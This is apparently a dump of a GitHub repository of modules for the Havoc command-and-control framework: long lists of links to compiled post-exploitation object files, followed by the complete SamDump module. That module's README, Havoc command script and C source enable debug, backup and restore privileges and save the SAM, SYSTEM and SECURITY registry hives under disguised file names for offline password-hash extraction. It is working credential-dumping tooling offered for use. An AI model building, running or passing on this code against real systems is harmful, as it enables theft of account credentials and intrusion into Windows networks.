https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_start.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_stop.x64.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_stop.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_stop.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_stop.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/setuserpass.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/setuserpass.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/setuserpass.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/setuserpass.x86.o -------------------------------------------------------------------------------- /RemoteOps/makefile: -------------------------------------------------------------------------------- 1 | NAME = CS-Remote-OPs-BOF 2 | BIN = bin 3 | 4 | all: 5 | @ cd $(NAME); chmod +x make_all.sh; bash ./make_all.sh 6 | @ find $(NAME)/Injection -name '*.o' -exec cp {} $(BIN)/ \; 7 | @ find $(NAME)/Remote -name '*.o' -exec cp {} $(BIN)/ \; 8 | 9 | clean: 10 | rm $(BIN)/*.o 11 | -------------------------------------------------------------------------------- /SamDump/README.md: -------------------------------------------------------------------------------- 1 | # About 2 | Beacon Object File(BOF) for CobaltStrike that will acquire the necessary privileges and dump SAM - SYSTEM - SECURITY registry keys for offline parsing and hash 
extraction. 3 | 4 | ## Instructions 5 | 6 | CNA will register the command `bof-regsave`: 7 | 8 | ``` 9 | beacon> bof-regsave c:\temp\ 10 | ``` 11 | 12 | By default the output will be saved in the following files: 13 | 14 | ``` 15 | samantha.txt - SAM 16 | systemic.txt - SYSTEM 17 | security.txt - SECURITY 18 | ``` 19 | 20 | You can modify the file names by changing `entry.c`. 21 | 22 | ## Credits 23 | 24 | Template & Makefile based on repo from [@realoriginal](https://github.com/realoriginal/beacon-object-file) 25 | 26 | 27 | ## Reading material for BOF 28 | 29 | [CS Beacon Object Files](https://www.cobaltstrike.com/help-beacon-object-files) 30 | 31 | [Aggressor-Script functions](https://www.cobaltstrike.com/aggressor-script/functions.html) 32 | 33 | [Beacon Object Files - Luser Demo](https://www.youtube.com/watch?v=gfYswA_Ronw) 34 | 35 | [A Developer's Introduction To Beacon Object Files](https://www.trustedsec.com/blog/a-developers-introduction-to-beacon-object-files/) 36 | 37 | _Github repos_ 38 | 39 | ``` 40 | https://github.com/rsmudge/ZeroLogon-BOF 41 | https://github.com/rsmudge/CVE-2020-0796-BOF 42 | https://github.com/trustedsec/CS-Situational-Awareness-BOF 43 | https://github.com/tomcarver16/BOF-DLL-Inject 44 | https://github.com/m57/cobaltstrike_bofs/ 45 | https://github.com/rvrsh3ll/BOF_Collection/ 46 | https://github.com/realoriginal/bof-NetworkServiceEscalate 47 | ``` 48 | 49 | ## Author 50 | [@leftp](https://github.com/leftp) 51 | -------------------------------------------------------------------------------- /SamDump/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # Beacon Object File ( BOF ) Compiler 3 | # 4 | # Used to create object files that are 5 | # compatible with Beacon's inline-execute 6 | # command. 
7 | # 8 | 9 | CC_x64 := x86_64-w64-mingw32-gcc 10 | LD_x64 := x86_64-w64-mingw32-ld 11 | STRx64 := x86_64-w64-mingw32-strip 12 | CC_x86 := i686-w64-mingw32-gcc 13 | LD_x86 := i686-w64-mingw32-ld 14 | STRx86 := i686-w64-mingw32-strip 15 | 16 | SOURCE := $(wildcard source/*.c) 17 | OBJECT := $(SOURCE:%.c=%.o) 18 | CFLAGS := -Os -s -Qn -nostdlib 19 | LFLAGS := -Wl,-s,--exclude-all-symbols 20 | 21 | all: $(OBJECT) 22 | $(LD_x64) -x -r source/*_x64.o -o regdump.x64.o 23 | $(LD_x86) -x -r source/*_x86.o -o regdump.x86.o 24 | 25 | .c.o: 26 | $(CC_x64) -o $(basename $@)_x64.o -c $< $(CFLAGS) $(LFLAGS) 27 | $(STRx64) -N $(basename $(notdir $@)).c $(basename $@)_x64.o 28 | $(CC_x86) -o $(basename $@)_x86.o -c $< $(CFLAGS) $(LFLAGS) 29 | $(STRx86) -N $(basename $(notdir $@)).c $(basename $@)_x86.o 30 | 31 | clean: 32 | rm -rf source/*_x64.o 33 | rm -rf source/*_x86.o 34 | rm -rf regdump.x64.o regdump.x86.o 35 | -------------------------------------------------------------------------------- /SamDump/regdump.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SamDump/regdump.x64.o -------------------------------------------------------------------------------- /SamDump/regdump.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SamDump/regdump.x86.o -------------------------------------------------------------------------------- /SamDump/samdump.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand 2 | import re 3 | import time 4 | 5 | # https://github.com/EncodeGroup/BOF-RegSave/tree/master 6 | 7 | def is_full_path(path): 8 | return re.match(r'^[a-zA-Z]:\\', path) is not None 9 | 10 | def samdump(demonID, *params): 11 | TaskID : str = 
None 12 | demon : Demon = None 13 | packer = Packer() 14 | 15 | num_params = len(params) 16 | path = '' 17 | 18 | demon = Demon( demonID ) 19 | 20 | if num_params != 1: 21 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "missing the path" ) 22 | return True 23 | 24 | path = params[ 0 ] 25 | 26 | packer.addstr(path) 27 | 28 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to dump the SAM registry" ) 29 | 30 | demon.InlineExecute( TaskID, "go", f"regdump.{demon.ProcessArch}.o", packer.getbuffer(), False ) 31 | 32 | return TaskID 33 | 34 | RegisterCommand( samdump, "", "samdump", "Dump the SAM, SECURITY and SYSTEM registries", 0, "", "C:\\Windows\\Temp\\" ) 35 | -------------------------------------------------------------------------------- /SamDump/source/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 
8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void 
BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 62 | -------------------------------------------------------------------------------- /SamDump/source/common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // 4 | // Common Header Includes 5 | // 6 | #include 7 | #include 8 | 9 | // 10 | // Internal "Beacon" API header 11 | // 12 | #include "beacon.h" 13 | 14 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA (HKEY, LPCSTR, DWORD, REGSAM, PHKEY); 15 | WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY); 16 | WINADVAPI LONG WINAPI ADVAPI32$RegSaveKeyA (HKEY, LPCSTR, LPSECURITY_ATTRIBUTES); 17 | WINBASEAPI BOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE, DWORD, PHANDLE); 18 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (void); 19 | WINBASEAPI BOOL WINAPI ADVAPI32$LookupPrivilegeValueA (LPCSTR, LPCSTR, PLUID); 20 | WINBASEAPI BOOL WINAPI ADVAPI32$AdjustTokenPrivileges(HANDLE, BOOL, PTOKEN_PRIVILEGES, DWORD, PTOKEN_PRIVILEGES, PDWORD); 21 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (void); 22 | WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle (HANDLE); 23 | WINBASEAPI LPSTR WINAPI SHLWAPI$PathCombineA(LPSTR,LPCSTR,LPCSTR); 24 | -------------------------------------------------------------------------------- /SamDump/source/entry.c: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | 3 | 4 | void EnableDebugPriv( LPCSTR priv ) 5 | { 6 | HANDLE hToken; 7 | LUID luid; 8 | TOKEN_PRIVILEGES tp; 9 
| 10 | 11 | if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) 12 | { 13 | BeaconPrintf(CALLBACK_ERROR, "[*] OpenProcessToken failed, Error = %d .\n" , KERNEL32$GetLastError() ); 14 | return; 15 | } 16 | 17 | if (ADVAPI32$LookupPrivilegeValueA( NULL, priv, &luid ) == 0 ) 18 | { 19 | BeaconPrintf(CALLBACK_ERROR, "[*] LookupPrivilegeValue() failed, Error = %d .\n", KERNEL32$GetLastError() ); 20 | KERNEL32$CloseHandle( hToken ); 21 | return; 22 | } 23 | 24 | tp.PrivilegeCount = 1; 25 | tp.Privileges[0].Luid = luid; 26 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 27 | 28 | if (!ADVAPI32$AdjustTokenPrivileges( hToken, FALSE, &tp, sizeof(tp), (PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL )) 29 | { 30 | BeaconPrintf(CALLBACK_ERROR, "[*] AdjustTokenPrivileges() failed, Error = %u\n", KERNEL32$GetLastError() ); 31 | return; 32 | } 33 | 34 | KERNEL32$CloseHandle( hToken ); 35 | } 36 | 37 | void ExportRegKey(LPCSTR subkey, LPCSTR outFile) 38 | { 39 | HKEY hSubKey; 40 | LPSECURITY_ATTRIBUTES lpSecurityAttributes = NULL; 41 | if(ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE,subkey,REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_ALL_ACCESS,&hSubKey)==ERROR_SUCCESS) 42 | { 43 | if (ADVAPI32$RegSaveKeyA(hSubKey, outFile, lpSecurityAttributes)==ERROR_SUCCESS) 44 | { 45 | BeaconPrintf(CALLBACK_OUTPUT,"[*] Exported HKLM\\%s at %s\n", subkey, outFile); 46 | } 47 | else 48 | { 49 | BeaconPrintf(CALLBACK_ERROR,"[*] RegSaveKey failed."); 50 | } 51 | 52 | ADVAPI32$RegCloseKey(hSubKey); 53 | } 54 | else 55 | { 56 | BeaconPrintf(CALLBACK_ERROR,"[*] Could not open key %s",subkey); 57 | } 58 | } 59 | 60 | void go(char * args, int alen) 61 | { 62 | datap parser; 63 | 64 | char buffer_1[MAX_PATH] = ""; 65 | char *lpStr1; 66 | lpStr1 = buffer_1; 67 | 68 | char buffer_sam[ ] = "samantha.txt"; 69 | char *lpStrsam; 70 | lpStrsam = buffer_sam; 71 | 72 | char buffer_sys[ ] = "systemic.txt"; 73 | char *lpStrsys; 74 | lpStrsys = 
buffer_sys; 75 | 76 | char buffer_sec[ ] = "security.txt"; 77 | char *lpStrsec; 78 | lpStrsec = buffer_sec; 79 | 80 | if (!BeaconIsAdmin()){ 81 | BeaconPrintf(CALLBACK_ERROR, "Admin privileges required to use this module!"); 82 | return; 83 | } 84 | 85 | BeaconDataParse(&parser, args, alen); // Parsing arguments from cna 86 | char * dir; 87 | dir = BeaconDataExtract(&parser, NULL); 88 | 89 | //Enabling required privileges for reg operations 90 | EnableDebugPriv(SE_DEBUG_NAME); 91 | EnableDebugPriv(SE_RESTORE_NAME); 92 | EnableDebugPriv(SE_BACKUP_NAME); 93 | 94 | SHLWAPI$PathCombineA(lpStr1,dir,lpStrsys); 95 | ExportRegKey("SYSTEM",lpStr1); //exporting SYSTEM 96 | 97 | SHLWAPI$PathCombineA(lpStr1,dir,lpStrsam); 98 | ExportRegKey("SAM",lpStr1); //exporting SAM 99 | 100 | SHLWAPI$PathCombineA(lpStr1,dir,lpStrsec); 101 | ExportRegKey("SECURITY",lpStr1); //exporting SECURITY 102 | }; -------------------------------------------------------------------------------- /SamDump/source/entry_x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SamDump/source/entry_x64.o -------------------------------------------------------------------------------- /SamDump/source/entry_x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SamDump/source/entry_x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/adcs_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/adcs_enum.x64.o -------------------------------------------------------------------------------- 
/SituationalAwareness/ObjectFiles/adcs_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/adcs_enum.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/arp.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/arp.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/arp.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/arp.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/cacls.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/cacls.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/cacls.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/cacls.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/dir.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/dir.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/dir.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/dir.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/driversigs.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/driversigs.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/driversigs.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/driversigs.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/enum_filter_driver.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/enum_filter_driver.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/enum_filter_driver.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/enum_filter_driver.x86.o 
-------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/enumlocalsessions.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/enumlocalsessions.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/enumlocalsessions.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/enumlocalsessions.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/env.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/env.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/env.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/env.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/get-netsession.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/get-netsession.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/get-netsession.x86.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/get-netsession.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/get_password_policy.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/get_password_policy.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/get_password_policy.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/get_password_policy.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/ipconfig.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/ipconfig.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/ipconfig.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/ipconfig.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/ldapsearch.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/ldapsearch.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/ldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/ldapsearch.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/list_firewall_rules.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/list_firewall_rules.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/list_firewall_rules.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/list_firewall_rules.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/listdns.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/listdns.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/listdns.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/listdns.x86.o 
-------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/locale.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/locale.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/locale.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/locale.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netgroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netgroup.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netgroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netgroup.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netlocalgroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netlocalgroup.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netlocalgroup.x86.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netlocalgroup.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netshares.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netshares.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netshares.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netshares.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netstat.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netstat.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netstat.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netstat.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuptime.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuptime.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuptime.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuptime.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuser.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuser.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuser.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuserenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuserenum.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuserenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuserenum.x86.o 
-------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netview.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netview.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netview.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netview.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/nslookup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/nslookup.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/nslookup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/nslookup.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/quser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/quser.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/quser.x86.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/quser.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/reg_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/reg_query.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/reg_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/reg_query.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/resources.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/resources.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/resources.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/resources.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/routeprint.x64.o: -------------------------------------------------------------------------------- 